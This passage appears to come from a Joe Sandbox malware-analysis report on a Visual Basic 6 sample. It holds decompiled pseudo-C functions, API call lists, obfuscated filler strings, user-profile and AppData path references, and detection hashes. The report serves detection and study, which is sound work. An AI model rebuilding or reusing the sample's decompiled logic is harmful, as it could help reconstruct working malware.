					_push( &_v116);
					L00401722();
					_push( &_v116);
					_push( &_v36);
					L00401728();
					L004018E4();
					_push( &_v112);
					_push( &_v96);
					_push( &_v80);
					_push(3);
					L004018F6();
					_v72 = 0xf751f1b0;
					_v68 = 0x5af5;
					_v80 = 6;
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					_push( &_v80);
					L00401818();
					L0040192C();
					L00401938();
					if( *0x427544 != 0) {
						_v196 = 0x427544;
					} else {
						_push(0x427544);
						_push(0x403c1c);
						L00401878();
						_v196 = 0x427544;
					}
					_t115 =  &_v196; // 0x427544
					_v156 =  *((intOrPtr*)( *_t115));
					_t188 =  *((intOrPtr*)( *_v156 + 0x14))(_v156,  &_v64);
					asm("fclex");
					_v160 = _t188;
					if(_v160 >= 0) {
						_v200 = _v200 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c0c);
						_push(_v156);
						_push(_v160);
						L0040193E();
						_v200 = _t188;
					}
					_v164 = _v64;
					_t193 =  *((intOrPtr*)( *_v164 + 0x118))(_v164,  &_v152);
					asm("fclex");
					_v168 = _t193;
					if(_v168 >= 0) {
						_v204 = _v204 & 0x00000000;
					} else {
						_push(0x118);
						_push(0x403c2c);
						_push(_v164);
						_push(_v168);
						L0040193E();
						_v204 = _t193;
					}
					L0040173A();
					_v28 = _t193;
					L004018A2();
				}
				_v40 = 0x8473fe;
				_push(0x42350f);
				L004018E4();
				_push( &_v36);
				_push(0);
				L004017A0();
				_t169 =  &_v44;
				_push(_t169);
				_push(0);
				L004017A0();
				L004018E4();
				return _t169;
			}

0x00423005
0x00423014
0x00423020
0x00423028
0x0042302b
0x00423032
0x00423041
0x00423044
0x0042304b
0x00423058
0x0042305d
0x00423062
0x0042306c
0x00423071
0x00423072
0x00423075
0x00423076
0x00423080
0x00423085
0x00423086
0x0042308d
0x00423093
0x0042309d
0x004230a1
0x004230a2
0x004230a4
0x004230a9
0x004230af
0x004230bd
0x004230c3
0x004230ca
0x004230d7
0x004230dc
0x004230e4
0x004230e8
0x004230e9
0x004230f1
0x004230f2
0x004230fc
0x00423104
0x00423108
0x00423109
0x0042310b
0x00423113
0x0042311a
0x00423127
0x0042312c
0x0042312e
0x00423136
0x0042313a
0x0042313b
0x00423143
0x00423147
0x00423148
0x00423150
0x00423154
0x00423155
0x0042315d
0x00423161
0x00423162
0x00423164
0x00423169
0x00423173
0x00423190
0x00423175
0x00423175
0x0042317a
0x0042317f
0x00423184
0x00423184
0x0042319a
0x004231a2
0x004231ba
0x004231bd
0x004231bf
0x004231cc
0x004231ee
0x004231ce
0x004231ce
0x004231d0
0x004231d5
0x004231db
0x004231e1
0x004231e6
0x004231e6
0x004231f8
0x00423213
0x00423219
0x0042321b
0x00423228
0x0042324d
0x0042322a
0x0042322a
0x0042322f
0x00423234
0x0042323a
0x00423240
0x00423245
0x00423245
0x0042325a
0x0042325f
0x00423266
0x00423266
0x0042326b
0x00423272
0x0042327f
0x00423287
0x0042328b
0x0042328c
0x00423291
0x0042329b
0x004232a8
0x004232a9
0x004232af
0x004232b0
0x004232b5
0x004232bf
0x004232c3
0x004232c4
0x004232c6
0x004232d7
0x004232dd
0x004232e4
0x004232ee
0x004232ef
0x004232f9
0x00423301
0x00423307
0x00423311
0x00423314
0x0042331b
0x0042331d
0x00423325
0x00423329
0x0042332a
0x00423332
0x00423336
0x00423337
0x0042333f
0x00423343
0x00423344
0x0042334c
0x00423354
0x00423358
0x0042335c
0x0042335d
0x0042335f
0x00423367
0x0042336e
0x00423375
0x0042337c
0x0042337e
0x00423380
0x00423382
0x00423387
0x00423388
0x00423392
0x0042339a
0x004233a6
0x004233c3
0x004233a8
0x004233a8
0x004233ad
0x004233b2
0x004233b7
0x004233b7
0x004233cd
0x004233d5
0x004233ed
0x004233f0
0x004233f2
0x004233ff
0x00423421
0x00423401
0x00423401
0x00423403
0x00423408
0x0042340e
0x00423414
0x00423419
0x00423419
0x0042342b
0x00423446
0x0042344c
0x0042344e
0x0042345b
0x00423480
0x0042345d
0x0042345d
0x00423462
0x00423467
0x0042346d
0x00423473
0x00423478
0x00423478
0x0042348d
0x00423492
0x00423499
0x00423499
0x0042349e
0x004234a5
0x004234eb
0x004234f3
0x004234f4
0x004234f6
0x004234fb
0x004234fe
0x004234ff
0x00423501
0x00423509
0x0042350e

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00423020
__vbaVarDup.MSVBVM60 ref: 00423058
__vbaStrI4.MSVBVM60(007829A8), ref: 00423062
__vbaStrMove.MSVBVM60(007829A8), ref: 0042306C
#667.MSVBVM60(?,00000000,007829A8), ref: 00423076
__vbaStrMove.MSVBVM60(?,00000000,007829A8), ref: 00423080
__vbaStrCmp.MSVBVM60(00000000,?,00000000,007829A8), ref: 00423086
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,00000000,007829A8), ref: 004230A4
__vbaFreeVar.MSVBVM60(?,?,004015F6), ref: 004230AF
__vbaVarDup.MSVBVM60 ref: 004230D7
#619.MSVBVM60(?,?,000000C7), ref: 004230E9
__vbaStrVarMove.MSVBVM60(?,?,?,000000C7), ref: 004230F2
__vbaStrMove.MSVBVM60(?,?,?,000000C7), ref: 004230FC
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,000000C7), ref: 0042310B
__vbaVarDup.MSVBVM60 ref: 00423127
#717.MSVBVM60(?,?,00000080,00000000), ref: 0042313B
__vbaVar2Vec.MSVBVM60(?,?,?,?,00000080,00000000), ref: 00423148
__vbaAryMove.MSVBVM60(?,?,?,?,?,?,00000080,00000000), ref: 00423155
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,00000080,00000000), ref: 00423164
__vbaNew2.MSVBVM60(00403C1C,00427544,?,?,?,?,?,?,?,?,004015F6), ref: 0042317F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 004231E1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,00000118), ref: 00423240
__vbaI2I4.MSVBVM60(00000000,?,00403C2C,00000118), ref: 0042325A
__vbaFreeObj.MSVBVM60(00000000,?,00403C2C,00000118), ref: 00423266
__vbaVarDup.MSVBVM60 ref: 0042327F
#666.MSVBVM60(?,?), ref: 0042328C
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?), ref: 004232B0
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008008,?,?,?,?,?), ref: 004232C6
#572.MSVBVM60(00000002), ref: 004232EF
__vbaStrMove.MSVBVM60(00000002), ref: 004232F9
#717.MSVBVM60(?,00000008,00000080,00000000,?,?,?,00000002), ref: 0042332A
__vbaVar2Vec.MSVBVM60(?,?,?,00000008,00000080,00000000,?,?,?,00000002), ref: 00423337
__vbaAryMove.MSVBVM60(?,?,?,?,?,00000008,00000080,00000000,?,?,?,00000002), ref: 00423344
__vbaFreeStr.MSVBVM60(?,?,?,?,?,00000008,00000080,00000000,?,?,?,00000002), ref: 0042334C
__vbaFreeVarList.MSVBVM60(00000003,00000002,00000008,?,?,?,?,?,?,00000008,00000080,00000000,?,?,?,00000002), ref: 0042335F
#703.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 00423388
__vbaStrMove.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 00423392
__vbaFreeVar.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 0042339A
__vbaNew2.MSVBVM60(00403C1C,00427544,00000006,000000FF,000000FE,000000FE,000000FE), ref: 004233B2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 00423414
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,00000118), ref: 00423473
__vbaI2I4.MSVBVM60(00000000,?,00403C2C,00000118), ref: 0042348D
__vbaFreeObj.MSVBVM60(00000000,?,00403C2C,00000118), ref: 00423499
__vbaFreeStr.MSVBVM60(0042350F), ref: 004234EB
__vbaAryDestruct.MSVBVM60(00000000,?,0042350F), ref: 004234F6
__vbaAryDestruct.MSVBVM60(00000000,0042350F,00000000,?,0042350F), ref: 00423501
__vbaFreeStr.MSVBVM60(00000000,0042350F,00000000,?,0042350F), ref: 00423509

Strings

userprofile, xrefs: 00423044
DuB, xrefs: 0042319A
Zoosporangia5, xrefs: 00423113
bugsering, xrefs: 004230C3
appdata, xrefs: 0042326B
k, xrefs: 004232DD
DuB, xrefs: 00423349
Aktiverings, xrefs: 00423291
DuB, xrefs: 004233CD

Memory Dump Source

Source File: 00000000.00000002.1189901321.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1189897994.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189918229.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189922002.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189925615.000000000042B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G47wmLn8uy.jbxd

Similarity

API ID: __vba$Free$Move$List$CheckHresult$#717DestructNew2Var2$#572#619#666#667#703Chkstk
String ID: Aktiverings$DuB$DuB$DuB$Zoosporangia5$appdata$bugsering$k$userprofile
API String ID: 1742684637-1173490879
Opcode ID: 82410873bc8333d57119b7af6158442f920b54a57f65d0b0048a4576e873e7aa
Instruction ID: 1f66434842af9ef31e416fc89f99c366255d0c6cb2e0dc55e27a9318646d1039
Opcode Fuzzy Hash: 82410873bc8333d57119b7af6158442f920b54a57f65d0b0048a4576e873e7aa
Instruction Fuzzy Hash: B4D1C871D0022CAADB10EFA1DC45FDEBBB9BF04304F5081AAE119B71A1DB789A49CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00425E3B, Relevance: 63.2, APIs: 31, Strings: 5, Instructions: 211
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00425E3B(void* __ebx, void* __edi, void* __esi, long long __fp0, void* _a12, void* _a20, signed int* _a24) {
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				void* _v44;
				void* _v48;
				char _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v76;
				char _v92;
				long long _v100;
				char _v108;
				intOrPtr _v116;
				char _v124;
				char _v140;
				char _v144;
				char* _v152;
				char _v160;
				char* _v168;
				char _v176;
				char _v180;
				long long _v188;
				void* _v192;
				signed int _v196;
				intOrPtr* _v200;
				signed int _v204;
				signed int _v216;
				char _v220;
				signed int _v224;
				signed int _v228;
				short _t104;
				char* _t108;
				char* _t112;
				signed int _t135;
				signed int _t140;
				void* _t166;
				intOrPtr _t167;

				_t167 = _t166 - 0xc;
				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t167;
				L004015F0();
				_v16 = _t167;
				_v12 = 0x4015c8;
				L004018DE();
				L004018DE();
				 *_a24 =  *_a24 & 0x00000000;
				_v152 = L"appdata";
				_v160 = 8;
				L004018FC();
				_push( &_v76);
				_push( &_v92);
				L0040184E();
				_v168 = L"vrdibrevs";
				_v176 = 0x8008;
				_push( &_v92);
				_t104 =  &_v176;
				_push(_t104);
				L0040175E();
				_v192 = _t104;
				_push( &_v92);
				_push( &_v76);
				_push(2);
				L004018F6();
				if(_v192 != 0) {
					_v152 = L"Skandskriftet2";
					_v160 = 8;
					L004018FC();
					_push(0x22);
					_push( &_v76);
					_push( &_v92);
					L0040168C();
					_push( &_v92);
					_t112 =  &_v52;
					_push(_t112);
					L004018EA();
					_push(_t112);
					L004017BE();
					_v188 = __fp0;
					_v100 = _v188;
					_v108 = 5;
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					_push( &_v108);
					L0040174C();
					L0040192C();
					_v216 = _v56;
					_v56 = _v56 & 0x00000000;
					_v116 = _v216;
					_v124 = 8;
					_push(0);
					_push(0x80);
					_push( &_v124);
					_push( &_v140);
					L00401740();
					_push( &_v140);
					_push( &_v144);
					L00401722();
					_push( &_v144);
					_push( &_v28);
					L00401728();
					_push( &_v56);
					_push( &_v52);
					_push(2);
					L00401914();
					_push( &_v140);
					_push( &_v124);
					_push( &_v108);
					_push( &_v92);
					_push( &_v76);
					_push(5);
					L004018F6();
					_v68 = 0x4e68f2d0;
					_v64 = 0x5af8;
					_v76 = 6;
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					_push( &_v76);
					L00401818();
					L0040192C();
					L00401938();
					if( *0x427544 != 0) {
						_v220 = 0x427544;
					} else {
						_push(0x427544);
						_push(0x403c1c);
						L00401878();
						_v220 = 0x427544;
					}
					_t64 =  &_v220; // 0x427544
					_v192 =  *((intOrPtr*)( *_t64));
					_t135 =  *((intOrPtr*)( *_v192 + 0x14))(_v192,  &_v60);
					asm("fclex");
					_v196 = _t135;
					if(_v196 >= 0) {
						_v224 = _v224 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c0c);
						_push(_v192);
						_push(_v196);
						L0040193E();
						_v224 = _t135;
					}
					_v200 = _v60;
					_t140 =  *((intOrPtr*)( *_v200 + 0x118))(_v200,  &_v180);
					asm("fclex");
					_v204 = _t140;
					if(_v204 >= 0) {
						_v228 = _v228 & 0x00000000;
					} else {
						_push(0x118);
						_push(0x403c2c);
						_push(_v200);
						_push(_v204);
						L0040193E();
						_v228 = _t140;
					}
					L0040173A();
					_v40 = _t140;
					L004018A2();
				}
				L004018DE();
				asm("wait");
				_push(0x4261cd);
				_t108 =  &_v28;
				_push(_t108);
				_push(0);
				L004017A0();
				L004018E4();
				L004018E4();
				L004018E4();
				return _t108;
			}

0x00425e3e
0x00425e41
0x00425e4c
0x00425e4d
0x00425e59
0x00425e61
0x00425e64
0x00425e71
0x00425e7c
0x00425e84
0x00425e87
0x00425e91
0x00425ea4
0x00425eac
0x00425eb0
0x00425eb1
0x00425eb6
0x00425ec0
0x00425ecd
0x00425ece
0x00425ed4
0x00425ed5
0x00425eda
0x00425ee4
0x00425ee8
0x00425ee9
0x00425eeb
0x00425efc
0x00425f02
0x00425f0c
0x00425f1f
0x00425f24
0x00425f29
0x00425f2d
0x00425f2e
0x00425f36
0x00425f37
0x00425f3a
0x00425f3b
0x00425f40
0x00425f41
0x00425f46
0x00425f52
0x00425f55
0x00425f5c
0x00425f5e
0x00425f60
0x00425f62
0x00425f67
0x00425f68
0x00425f72
0x00425f7a
0x00425f80
0x00425f8a
0x00425f8d
0x00425f94
0x00425f96
0x00425f9e
0x00425fa5
0x00425fa6
0x00425fb1
0x00425fb8
0x00425fb9
0x00425fc4
0x00425fc8
0x00425fc9
0x00425fd1
0x00425fd5
0x00425fd6
0x00425fd8
0x00425fe6
0x00425fea
0x00425fee
0x00425ff2
0x00425ff6
0x00425ff7
0x00425ff9
0x00426001
0x00426008
0x0042600f
0x00426016
0x00426018
0x0042601a
0x0042601c
0x00426021
0x00426022
0x0042602c
0x00426034
0x00426040
0x0042605d
0x00426042
0x00426042
0x00426047
0x0042604c
0x00426051
0x00426051
0x00426067
0x0042606f
0x00426087
0x0042608a
0x0042608c
0x00426099
0x004260bb
0x0042609b
0x0042609b
0x0042609d
0x004260a2
0x004260a8
0x004260ae
0x004260b3
0x004260b3
0x004260c5
0x004260e0
0x004260e6
0x004260e8
0x004260f5
0x0042611a
0x004260f7
0x004260f7
0x004260fc
0x00426101
0x00426107
0x0042610d
0x00426112
0x00426112
0x00426127
0x0042612c
0x00426133
0x00426133
0x00426140
0x00426145
0x00426146
0x004261a9
0x004261ac
0x004261ad
0x004261af
0x004261b7
0x004261bf
0x004261c7
0x004261cc

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00425E59
__vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 00425E71
__vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 00425E7C
__vbaVarDup.MSVBVM60 ref: 00425EA4
#666.MSVBVM60(?,?), ref: 00425EB1
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?), ref: 00425ED5
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008008,?,?,?,?,?), ref: 00425EEB
__vbaVarDup.MSVBVM60 ref: 00425F1F
#515.MSVBVM60(?,?,00000022), ref: 00425F2E
__vbaStrVarVal.MSVBVM60(?,?,?,?,00000022), ref: 00425F3B
#581.MSVBVM60(00000000,?,?,?,?,00000022), ref: 00425F41
#702.MSVBVM60(00000005,000000FF,000000FE,000000FE,000000FE,00000000,?,?,?,?,00000022), ref: 00425F68
__vbaStrMove.MSVBVM60(00000005,000000FF,000000FE,000000FE,000000FE,00000000,?,?,?,?,00000022), ref: 00425F72
#717.MSVBVM60(?,00000008,00000080,00000000,00000005,000000FF,000000FE,000000FE,000000FE,00000000,?,?,?,?,00000022), ref: 00425FA6
__vbaVar2Vec.MSVBVM60(?,?,?,00000008,00000080,00000000,00000005,000000FF,000000FE,000000FE,000000FE,00000000,?,?,?,?), ref: 00425FB9
__vbaAryMove.MSVBVM60(?,?,?,?,?,00000008,00000080,00000000,00000005,000000FF,000000FE,000000FE,000000FE,00000000,?,?), ref: 00425FC9
__vbaFreeStrList.MSVBVM60(00000002,?,00000000,?,?,?,?,?,00000008,00000080,00000000,00000005,000000FF,000000FE,000000FE,000000FE), ref: 00425FD8
__vbaFreeVarList.MSVBVM60(00000005,?,?,?,?,?,?,?,?,?,?,004015F6), ref: 00425FF9
#703.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 00426022
__vbaStrMove.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 0042602C
__vbaFreeVar.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 00426034
__vbaNew2.MSVBVM60(00403C1C,00427544,00000006,000000FF,000000FE,000000FE,000000FE), ref: 0042604C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 004260AE
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,00000118), ref: 0042610D
__vbaI2I4.MSVBVM60(00000000,?,00403C2C,00000118), ref: 00426127
__vbaFreeObj.MSVBVM60(00000000,?,00403C2C,00000118), ref: 00426133
__vbaStrCopy.MSVBVM60(?,?,004015F6), ref: 00426140
__vbaAryDestruct.MSVBVM60(00000000,?,004261CD,?,?,004015F6), ref: 004261AF
__vbaFreeStr.MSVBVM60(00000000,?,004261CD,?,?,004015F6), ref: 004261B7
__vbaFreeStr.MSVBVM60(00000000,?,004261CD,?,?,004015F6), ref: 004261BF
__vbaFreeStr.MSVBVM60(00000000,?,004261CD,?,?,004015F6), ref: 004261C7

Strings

Skandskriftet2, xrefs: 00425F02
vrdibrevs, xrefs: 00425EB6
DuB, xrefs: 00426067
appdata, xrefs: 00425E87
EPITHELIA, xrefs: 00426138

Memory Dump Source

Source File: 00000000.00000002.1189901321.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1189897994.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189918229.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189922002.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189925615.000000000042B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G47wmLn8uy.jbxd

Similarity

API ID: __vba$Free$CopyListMove$CheckHresult$#515#581#666#702#703#717ChkstkDestructNew2Var2
String ID: DuB$EPITHELIA$Skandskriftet2$appdata$vrdibrevs
API String ID: 1303855674-3726788226
Opcode ID: 1cf0d629689183d522975eebccf4fad7111731d65993e3a9afeb671c66f8c055
Instruction ID: 3959da3aacf8ff51fd018e87adbcd18593ac4b00cfbe036b15299d2b2d4b9a03
Opcode Fuzzy Hash: 1cf0d629689183d522975eebccf4fad7111731d65993e3a9afeb671c66f8c055
Instruction Fuzzy Hash: 9491DA7190021CAADB10EF91CC45FDEB7B9BF04314F5082AAE119B71E1DB785A89CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00425C02, Relevance: 63.1, APIs: 33, Strings: 3, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00425C02(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v36;
				intOrPtr _v40;
				void* _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v72;
				char _v88;
				char* _v96;
				char _v104;
				char* _v112;
				char _v120;
				short _v124;
				char* _t65;
				short _t72;
				char* _t73;
				void* _t112;
				void* _t114;
				intOrPtr _t115;

				_t115 = _t114 - 0xc;
				 *[fs:0x0] = _t115;
				L004015F0();
				_v16 = _t115;
				_v12 = 0x4015b8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x6c,  *[fs:0x0], 0x4015f6, _t112);
				_push(0x1d);
				L00401836();
				L0040192C();
				_push(L"1:1:1");
				_push( &_v72);
				L00401752();
				_push( &_v72);
				_t65 =  &_v52;
				_push(_t65);
				L004018EA();
				_push(_t65);
				L00401692();
				L0040192C();
				_push(_t65);
				L004017E2();
				L0040192C();
				_push( &_v56);
				_push( &_v52);
				_push(2);
				L00401914();
				L00401938();
				_v96 =  &_v48;
				_v104 = 0x4008;
				_push(0x56);
				_push( &_v104);
				_push( &_v72);
				L004017DC();
				_v112 = L"Forels7";
				_v120 = 0x8008;
				_push( &_v72);
				_t72 =  &_v120;
				_push(_t72);
				L0040175E();
				_v124 = _t72;
				L00401938();
				_t73 = _v124;
				if(_t73 != 0) {
					_push(0x6878);
					_push( &_v72);
					L004016EC();
					_push( &_v72);
					L00401908();
					L0040192C();
					L00401938();
					_v96 = L"AFTENKURSER";
					_v104 = 8;
					L004018FC();
					_push(0x2c);
					_push( &_v72);
					_push( &_v88);
					L004016E6();
					_push( &_v88);
					L00401908();
					L0040192C();
					_push( &_v88);
					_push( &_v72);
					_push(2);
					L004018F6();
					_v96 = L"Uselvstndighedens";
					_v104 = 8;
					L004018FC();
					_push( &_v72);
					_push( &_v88);
					L004016E0();
					_push( &_v88);
					L00401908();
					L0040192C();
					_push( &_v88);
					_t73 =  &_v72;
					_push(_t73);
					_push(2);
					L004018F6();
				}
				_v40 = 0x3f1160;
				_push(0x425e14);
				L004018E4();
				L004018E4();
				L004018E4();
				L004018E4();
				L004018E4();
				return _t73;
			}

0x00425c05
0x00425c14
0x00425c1e
0x00425c26
0x00425c29
0x00425c30
0x00425c3f
0x00425c42
0x00425c44
0x00425c4e
0x00425c53
0x00425c5b
0x00425c5c
0x00425c64
0x00425c65
0x00425c68
0x00425c69
0x00425c6e
0x00425c6f
0x00425c79
0x00425c7e
0x00425c7f
0x00425c89
0x00425c91
0x00425c95
0x00425c96
0x00425c98
0x00425ca3
0x00425cab
0x00425cae
0x00425cb5
0x00425cba
0x00425cbe
0x00425cbf
0x00425cc4
0x00425ccb
0x00425cd5
0x00425cd6
0x00425cd9
0x00425cda
0x00425cdf
0x00425ce6
0x00425ceb
0x00425cf1
0x00425cf7
0x00425cff
0x00425d00
0x00425d08
0x00425d09
0x00425d13
0x00425d1b
0x00425d20
0x00425d27
0x00425d34
0x00425d39
0x00425d3e
0x00425d42
0x00425d43
0x00425d4b
0x00425d4c
0x00425d56
0x00425d5e
0x00425d62
0x00425d63
0x00425d65
0x00425d6d
0x00425d74
0x00425d81
0x00425d89
0x00425d8d
0x00425d8e
0x00425d96
0x00425d97
0x00425da1
0x00425da9
0x00425daa
0x00425dad
0x00425dae
0x00425db0
0x00425db5
0x00425db8
0x00425dbf
0x00425dee
0x00425df6
0x00425dfe
0x00425e06
0x00425e0e
0x00425e13

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00425C1E
#525.MSVBVM60(0000001D,?,?,?,?,004015F6), ref: 00425C44
__vbaStrMove.MSVBVM60(0000001D,?,?,?,?,004015F6), ref: 00425C4E
#541.MSVBVM60(?,1:1:1,0000001D,?,?,?,?,004015F6), ref: 00425C5C
__vbaStrVarVal.MSVBVM60(?,?,?,1:1:1,0000001D,?,?,?,?,004015F6), ref: 00425C69
#521.MSVBVM60(00000000,?,?,?,1:1:1,0000001D,?,?,?,?,004015F6), ref: 00425C6F
__vbaStrMove.MSVBVM60(00000000,?,?,?,1:1:1,0000001D,?,?,?,?,004015F6), ref: 00425C79
#519.MSVBVM60(00000000,00000000,?,?,?,1:1:1,0000001D,?,?,?,?,004015F6), ref: 00425C7F
__vbaStrMove.MSVBVM60(00000000,00000000,?,?,?,1:1:1,0000001D,?,?,?,?,004015F6), ref: 00425C89
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,00000000,?,?,?,1:1:1,0000001D,?,?,?,?,004015F6), ref: 00425C98
__vbaFreeVar.MSVBVM60(?,?,004015F6), ref: 00425CA3
#619.MSVBVM60(?,00004008,00000056), ref: 00425CBF
__vbaVarTstNe.MSVBVM60(?,?,?,00004008,00000056), ref: 00425CDA
__vbaFreeVar.MSVBVM60(?,?,?,00004008,00000056), ref: 00425CE6
#698.MSVBVM60(?,00006878,?,?,?,00004008,00000056), ref: 00425D00
__vbaStrVarMove.MSVBVM60(?,?,00006878,?,?,?,00004008,00000056), ref: 00425D09
__vbaStrMove.MSVBVM60(?,?,00006878,?,?,?,00004008,00000056), ref: 00425D13
__vbaFreeVar.MSVBVM60(?,?,00006878,?,?,?,00004008,00000056), ref: 00425D1B
__vbaVarDup.MSVBVM60(?,?,00006878,?,?,?,00004008,00000056), ref: 00425D34
#617.MSVBVM60(?,?,0000002C,?,?,00006878,?,?,?,00004008,00000056), ref: 00425D43
__vbaStrVarMove.MSVBVM60(?,?,?,0000002C,?,?,00006878,?,?,?,00004008,00000056), ref: 00425D4C
__vbaStrMove.MSVBVM60(?,?,?,0000002C,?,?,00006878,?,?,?,00004008,00000056), ref: 00425D56
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,0000002C,?,?,00006878,?,?,?,00004008,00000056), ref: 00425D65
__vbaVarDup.MSVBVM60 ref: 00425D81
#524.MSVBVM60(?,?), ref: 00425D8E
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 00425D97
__vbaStrMove.MSVBVM60(?,?,?), ref: 00425DA1
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 00425DB0
__vbaFreeStr.MSVBVM60(00425E14,?,?,?,00004008,00000056), ref: 00425DEE
__vbaFreeStr.MSVBVM60(00425E14,?,?,?,00004008,00000056), ref: 00425DF6
__vbaFreeStr.MSVBVM60(00425E14,?,?,?,00004008,00000056), ref: 00425DFE
__vbaFreeStr.MSVBVM60(00425E14,?,?,?,00004008,00000056), ref: 00425E06
__vbaFreeStr.MSVBVM60(00425E14,?,?,?,00004008,00000056), ref: 00425E0E

Strings

AFTENKURSER, xrefs: 00425D20
Uselvstndighedens, xrefs: 00425D6D
1:1:1, xrefs: 00425C53

Memory Dump Source

Source File: 00000000.00000002.1189901321.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1189897994.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189918229.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189922002.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189925615.000000000042B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G47wmLn8uy.jbxd

Similarity

API ID: __vba$Free$Move$List$#519#521#524#525#541#617#619#698Chkstk
String ID: 1:1:1$AFTENKURSER$Uselvstndighedens
API String ID: 816865869-621384882
Opcode ID: ddd3b6d1161f6872793cf5bf8a55d3e83f7f94a20052d79605553fb067ee2fee
Instruction ID: 5570ae447aaab106fbf76ade462b26bd995a3e59c1ccba5a73f293eb170f129b
Opcode Fuzzy Hash: ddd3b6d1161f6872793cf5bf8a55d3e83f7f94a20052d79605553fb067ee2fee
Instruction Fuzzy Hash: 135171B2D0020C9ADB01FBE1D956EDEB7B8AF14704F50453BE105B71A1EB79AB09CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00424A1D, Relevance: 54.4, APIs: 27, Strings: 4, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00424A1D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* _v44;
				char _v48;
				char _v52;
				void* _v56;
				char _v72;
				char _v88;
				char _v92;
				char* _v100;
				intOrPtr _v108;
				char _v112;
				void* _v116;
				signed int _v120;
				intOrPtr* _v124;
				signed int _v128;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int _t76;
				char* _t83;
				signed int _t102;
				signed int _t107;
				void* _t127;
				void* _t129;
				intOrPtr _t130;

				_t130 = _t129 - 0xc;
				 *[fs:0x0] = _t130;
				L004015F0();
				_v16 = _t130;
				_v12 = 0x401540;
				_v8 = 0;
				_t76 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x7c,  *[fs:0x0], 0x4015f6, _t127);
				L004018DE();
				_push(0x3ef48c);
				L00401920();
				L0040192C();
				_push(_t76);
				L004016AA();
				_push( &_v48);
				_v52 =  *0x401538;
				L004016B0();
				L0040192C();
				_push(_t76);
				L00401734();
				asm("sbb eax, eax");
				_v116 =  ~( ~( ~_t76));
				_push( &_v52);
				_push( &_v48);
				_push(2);
				L00401914();
				if(_v116 != 0) {
